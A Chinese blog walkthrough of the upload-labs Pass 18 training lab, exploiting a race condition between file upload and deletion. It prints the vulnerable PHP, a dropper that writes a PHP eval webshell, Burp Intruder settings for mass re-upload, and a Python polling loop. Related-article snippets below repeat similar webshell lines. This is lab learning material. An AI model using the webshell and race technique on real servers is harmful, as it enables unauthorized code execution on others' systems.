upload_labs_pass18_条件竞争

最新推荐文章于 2024-04-25 22:04:21 发布
最新推荐文章于 2024-04-25 22:04:21 发布
阅读量3.8k 收藏 4
点赞数 4
分类专栏: 文件上传漏洞 网络安全 文章标签: 文件上传漏洞 网络安全 upload-labs
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51550750/article/details/124130453
版权

pass18

第18关和前面14-17关(要求上传图片马)不同,直接要求上传一个webshell
在这里插入图片描述

提示:

在这里插入图片描述

源码:

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

如果上传的不是白名单中的文件,会调用unlink方法删除文件。
这么想,貌似好像要用图片马,但是这关最好不要用文件包含漏洞,因为这也不是出题人的本意。

所以还是要上传webshell

如何绕过上传非白名单中的文件而不会被删除呢?

这一关的解决思路就是利用 上传成功之后移动文件到删除文件这段时间之内连接webshell(利用时间差)

在这里插入图片描述

利用上面绿色区域中的时间去连接webshell。

但是还有一个问题:即使在短期之内连接上了webshell,但是很快文件又会被删除。—》这样连接webshell有什么意义呢?

解决:

在这里插入图片描述

首先上传一个“独特”的木马,但是这个木马不是一句话木马,但是能够产生一句话木马,使得产生 的一句话木马能够不被删除而能够连接webshell

这个“独特”的木马内容如下:

<?php fputs(fopen('zyy.php','w'),'<?php @eval($_POST["zyy"])?>');?>

这个绕过的思路就是“条件竞争

如何在短期之内利用这个独特的木马呢?有两种方法:

1.通过python脚本多线程并发的访问。
2.利用burp不断的上传文件。

首先记录利用burp进行绕过:

pass18-burp不断上传文件

首先开启burp抓包,上传competition.php

在这里插入图片描述

利用“Intruder”模块进行反复的文件上传。

发送到intruder:
在这里插入图片描述

在Position中清空,不需要payload。

在Payloads中,选择 Null payload:
在这里插入图片描述

持续不断无限地:选择Continue indefinitely
在这里插入图片描述

Resource Pool:
将线程调整的大一些:
在这里插入图片描述
20个并发的线程

然后开始攻击:start Attack
在这里插入图片描述
发现靶机的上传目录下不断的有文件被删除又被上传:
在这里插入图片描述

在这里插入图片描述

然后我电脑的风扇开始呼呼呼的叫了,hhh

然后访问这个competition文件所在的地址,使其产生一句话木马文件。

某一刻是可以访问到的:
在这里插入图片描述

而且幸运的话,在这个目录下会生成一个一句话木马文件,但是我就没那么幸运,,,没有生成,,,

如果你能够生成,那么就可以连接这个一句话木马webshell了。

pass18-python多线程-条件竞争

准备条件竞争的python代码:

import requests
url = "http://localhost:7298/upload-labs/upload/competition.php"
while True:
    html = requests.get(url)
    if html.status_code == 200:
        print("OK")
        break

基本上就是这两个思路了。

可恶,为了跑这一关,我虚拟机靶场崩了。。。

qq_51550750
关注
  • 4
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Upload-labs通关攻略(适合新手)
夜思红尘的博客
04-12 2151
这是一篇关于upload-labs通关攻略,适合新手
upload-labs靶场pass17关脚本条件竞争
FRANXX_02的博客
10-11 952
upload-labs靶场pass17关脚本条件竞争
upload-labs 18-21关 详解 (完结)
qq_53409748的博客
03-02 1023
upload-labs 18-21关 详解 (完结)
文件上传复习(upload-labs18-19关)
最新发布
2302_80935968的博客
04-25 273
使用文件漏洞upload-labs/include.php?选择Null payloads,然后选择无限循环(Continue indefinitely)只要被成功当作PHP文件解析,就会生成shell18.php 文件。然后 bp设置无限发送空的Payloads,来让它一直上传该文件。在python脚本运行后,burpsuite开始无限制重放数据。直到python脚本出现OK,再关闭burpsuite。打开根目录,可以看见shell18文件已经被成功上传。上传文件18.php,并且使用bp抓
文件上传upload-labs 第18关 条件竞争
YYYYU_ZHIZZZ的博客
11-08 548
文件上传靶场练习条件竞争
upload-labs18关
qq_46527080的博客
12-25 2329
漏洞介绍 条件竞争漏洞是一种服务器端的漏洞,是由于开发者设计应用程序并发处理时操作逻辑不合理而造成。当应用面临高并发的请求时未能同步好所有请求,导致请求与请求之间产生等待时出现逻辑缺陷。该漏洞一般出现在与数据库系统频繁交互的位置,例如金额同步、支付等较敏感操作处。另外条件竞争漏洞也会出现在其他位置,例如文件的操作处理等。 首先将文件上传到服务器,然后检测文件后缀名,如果不符合条件,就删掉,典型的“引狼入室”。 第十八关(条件竞争) 源码分析 首先准备一个创建shell的php <?php fputs
Upload-labs 18 条件竞争——通关
W小哥
01-13 4060
访问目标站点,提示上传图片马 查看源码 思路:上传shell.php.7z图片木马配合解析漏洞 实验步骤: 图片中php一句话木马代码:<?php fputs(fopen('shell2.php','w'),'<?php @eval($_POST["x"])?>’);?> 第一种:使用python脚本 第一步:burpsuite抓,上传文件名字shell.php.7z...
FreeRTOS_Labs_v.202009.00
10-11
官网下载的,官网速度可能慢一些...FreeRTOS_Labs_v.202009.00 FreeRTOS Labs Contains source code and example projects for the FreeRTOS Labs projects. The most up to date source code is available on Github.
Selet book.zip_silicon labs_无线产品
09-20
**Silicon Labs 无线产品选型指南** 在无线通信领域,Silicon Labs 是一家领先的供应商,提供各种无线解决方案,适用于物联网(IoT)、智能家居、工业自动化和智能城市等多种应用场景。该公司的产品线广泛,括低...
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
si2168.rar_DVB-T2_si2168_silicon labs
09-14
最后,“silicon labs”表明这是由Silicon Labs公司开发的产品。 **描述解析:** "Silicon Labs Si2168 DVB-T T2 C demodulator driver." 描述中提到的是一个C语言编写的驱动程序,该驱动用于支持Si2168芯片在处理...
DE2_labs_verilog
01-01
1. **Verilog基础知识**:了解Verilog的基本语法,括数据类型、运算符、结构体(module)、赋值语句、条件语句、循环语句以及非阻塞赋值(non-blocking assignment)与阻塞赋值(blocking assignment)的区别。...
upload-labs靶场通关指南(18-19关)
永远是少年
09-16 973
今天继续给大家介绍渗透测试相关知识,本文主要内容是upload-labs靶场通关指南(18-19关)。 一、第18关 二、第19关
文件上传漏洞12】竞争条件攻击
Fighting_hawk的博客
03-18 4592
1. 理解业务逻辑漏洞的分析思路,该靶场是先保存后再删除,就存在这样的可利用漏洞,正确的开发思路应该是先对一切客户端的输入(括文件)过滤没问题后,才允许进入服务端。 2. 掌握利用竞争条件攻击逻辑漏洞的方法,该方法将适用于一切存在时间差的业务逻辑漏洞。...
WEB-CTF 条件竞争
iamsongyu的博客
10-24 6151
如何来形容这个类型的问题呢,就像是幼儿园发糖吃,每个人只能拿一块,但是如果你跟别人一起再拿一次老师也没办法分辨,毕竟一群小朋友老师也没办法分辨手和对应的人。 关于部分的Burpsuite使用的知识,在前面的https://blog.csdn.net/iamsongyu/article/details/82989478中已经讲了,就不在赘述   这是一个好文章,从上边摘抄和借鉴了不少 htt...
Web条件竞争
沐沐的博客
04-19 2862
  最近,正好操作系统课上正在学进程的竞争关系,再加上寒假安恒杯2月赛上有道web题考到了条件竞争漏洞的利用,所以就系统的学习和总结下条件竞争漏洞。一. 漏洞成因:线程编程中,为了保证数据操作的一致性,操作系统引入了锁机制,用于保证临界区代码的安全。通过锁机制,能够保证在多核多线程环境中,在某一个时间点上,只能有一个线程进入临界区代码,从而保证临界区中操作数据的一致性。临界区指的是一个访问共用资源...
条件竞争
kid的博客
06-03 3917
条件竞争 前言 前面强网杯的时候做upload,有大佬提出过条件竞争的思路,虽然最后不是,但看了下条件竞争感觉还是很有意思的,这里来学习一下 下面是从别人博客中引用,我感觉是把条件竞争讲的挺清楚的,举的例子和大佬在比赛中分析的也很像 下面以相关操作逻辑顺序设计的不合理为例,具体讨论一下这类问题的成因。在很多系统中都会含上传文件或者从远端获取文件保存在服务器的功能(如:允许用户使用网络上的图片...
Burpsuite配合蚁剑利用条件竞争
多喝i热水的博客
01-28 1230
目录 破解思路 绕过过程 打开pyhon脚本 打开Burpsuite 上传文件成功并连接 结合upload-labs-Pass18 破解思路 存在条件竞争漏洞,大概意思就是如果能在上传的一句话木马被删除之前访问成功了,那么就可以拿shell了 绕过过程 不断上传文件,在文件还没被删除前去读取文件, 若上传内容为<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST["pass"])?>');?>, 则还没被删
文件上传漏洞之——利用条件竞争绕过
wsnbbz的博客
03-04 4657
条件竞争漏洞 . 介绍 条件竞争漏洞是一种服务器端的漏洞,由于服务器端在处理不同的请求时是并发进行的,因此如果并发处理不当或相关操作顺序设计的不合理时,将会导致此类问题的发生 原理 上传文件源代码里没有校验上传的文件,文件直接上传,上传成功后才进行判断:如果文件格式符合要求,则重命名,如果文件格式不符合要求,将文件删除 由于服务器并发处理(同时)多个请求,假如a用户上传了木马文件,由于代码执行需要...
upload_labs 图片
07-29
根据提供的引用内容,上传图片的代码片段主要括对文件类型的判断和移动文件的操作。在引用\[1\]中,代码使用了`$_FILES\['upload_file'\]\['type'\]`来判断上传文件的类型,只接受`image/jpeg`、`image/png`和`image/gif`三种类型的图片。如果文件类型符合要求,则将文件移动到指定路径。如果移动成功,则设置`$is_upload`为`true`。如果移动失败,则设置`$msg`为"上传出错!"。如果文件类型不正确,则设置`$msg`为"文件类型不正确,请重新上传!"。如果文件夹不存在,则设置`$msg`为"文件夹不存在,请手工创建!"。 在引用\[2\]中,代码片段与引用\[1\]类似,但是在移动文件成功后,还对新生成的图片进行了二次渲染,并将其保存到指定路径。同时,原始的上传文件被删除。 在引用\[3\]中,代码片段与引用\[1\]类似,但是在判断文件类型时,使用了`FILES`函数来获取文件的MIME类型。其他部分与引用\[1\]相同。 根据提供的引用内容,无法确定具体的上传图片的功能和实现细节。如果您有关于upload_labs图片上传的具体问题,请提供更多的信息。 #### 引用[.reference_title] - *1* [文件上传漏洞(upload_labs1-12)](https://blog.csdn.net/qq_40448537/article/details/106941123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [upload_labs_pass17_二次渲染](https://blog.csdn.net/qq_51550750/article/details/124115320)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [文件上传upload_labs 1-5](https://blog.csdn.net/qq_45564150/article/details/121548836)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值